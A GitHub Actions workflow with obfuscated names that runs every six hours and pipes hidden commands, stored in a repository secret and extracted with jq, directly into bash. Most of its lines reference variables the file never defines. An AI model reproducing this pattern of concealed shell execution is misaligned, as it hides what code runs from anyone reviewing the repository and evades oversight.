name: linchengsheng6715

on:
  workflow_dispatch:
  schedule:
    - cron: '56 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: linchengsheng6715
        env:
          r0436: ${{ secrets.r0436 }}
        run: |
          echo $r0436 | jq -r .nk2768 | /bin/bash
          echo $tflc3 | jq -r .trnqo97989 | /bin/bash
          echo $nza33 | jq -r .yfz0047 | /bin/bash
          echo $jz93 | jq -r .ldscc4751 | /bin/bash
          echo $im34 | jq -r .x2268 | /bin/bash
          echo $fli02 | jq -r .m75 | /bin/bash
          echo $rikug6664 | jq -r .b026 | /bin/bash
          echo $ziom4010 | jq -r .dg666 | /bin/bash
          echo $suu0778 | jq -r .hczle901 | /bin/bash
          echo $qna1695 | jq -r .p278 | /bin/bash
          echo $vzovr00 | jq -r .hsk1833 | /bin/bash
          echo $b5 | jq -r .vckxv83649 | /bin/bash
          echo $x71331 | jq -r .kqlr0036 | /bin/bash
          echo $bm18704 | jq -r .p251 | /bin/bash
          echo $fl00 | jq -r .qhe1 | /bin/bash
          echo $p5602 | jq -r .eb525 | /bin/bash
          echo $sng2 | jq -r .gc26 | /bin/bash
          echo $v937 | jq -r .ev965 | /bin/bash

